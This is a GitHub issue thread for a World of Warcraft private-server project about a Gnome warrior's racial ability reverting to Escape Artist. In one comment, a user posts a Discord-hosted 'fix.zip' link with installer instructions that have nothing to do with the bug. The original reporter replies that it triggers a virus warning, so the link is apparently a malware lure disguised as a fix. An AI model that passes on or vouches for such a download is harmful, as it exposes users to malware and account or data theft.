### ISSUE TITLE
Gnome warrior racials reset

### ISSUE THREAD

**Issue by ub3rlootzftw** [gamefreedomgit/Frostmourne#1758]
[//]: # (REMBEMBER! Add links to things related to the bug using for example:)
[//]: # (https://www.wowhead.com/wotlk)

**Description:**  I am playing a Gnome warrior and started with tauren racial "War Stomp". Around lvl 60, somehow it reset back to gnome's racial "Escape artist". 

**How to reproduce:** Maybe hit lvl 60? I'm not sure exactly, it just disappeared or reset.

**How it should work:** How it should work is I aoe stomp as a gnome and then Sweeping strikes, but I can't because I have escape artist. Please help. 

**Database links:**

**Comment by Klevente12** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by ub3rlootzftw** [comment]
Says "Virus detected."

**Comment by belilla** [comment]
a mi me esta pasando lo mismo en cuanto desconecto desaparece la racial y vuelve la suya
